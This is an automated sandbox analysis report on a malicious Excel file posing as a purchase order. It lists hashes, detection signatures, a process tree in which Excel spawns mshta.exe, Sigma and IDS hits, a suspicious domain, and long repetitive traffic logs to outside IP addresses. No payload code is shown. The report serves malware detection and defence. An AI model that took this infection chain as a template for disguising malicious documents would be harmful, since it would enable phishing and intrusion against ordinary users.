Windows Analysis Report
PURCHASE ORDER 517-2025.xla.xlsx

Overview

General Information

Sample name: PURCHASE ORDER 517-2025.xla.xlsx
Analysis ID: 1649448
MD5: 4d57f2dfe4050bf6605af3c1be23d9e2
SHA1: db1b4d7cd15f21378a456e7fdf49648b39ba731a
SHA256: 2edf703005001488ac02fe1c1b08784c938d944a5e8dd4345b00ea3d6e7b68f6
Tags: xla, xlsx, user-abuse_ch

Detection

Score: 56
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)

Process Tree
  • System is w10x64
  • EXCEL.EXE (PID: 6896 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7444 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7536 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7716 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6896, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7444, ProcessName: mshta.exe
Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6896, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6896, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-03-26T19:48:43.839468+0100  2028371  3         Unknown Traffic  192.168.2.7  49699        13.107.246.41   443               TCP
2025-03-26T19:48:51.583738+0100  2028371  3         Unknown Traffic  192.168.2.7  49701        13.107.246.41   443               TCP
2025-03-26T19:48:51.593285+0100  2028371  3         Unknown Traffic  192.168.2.7  49702        13.107.246.41   443               TCP

AV Detection

Source: PURCHASE ORDER 517-2025.xla.xlsx, Virustotal: Detection: 31%
Source: PURCHASE ORDER 517-2025.xla.xlsx, ReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.7:49699 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe
Source: global traffic, DNS query: name: agr.my
Source: global traffic, DNS query: name: otelrules.svc.static.microsoft
Source: global traffic, TCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global traffic, TCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global traffic, TCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global traffic, TCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global traffic, TCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
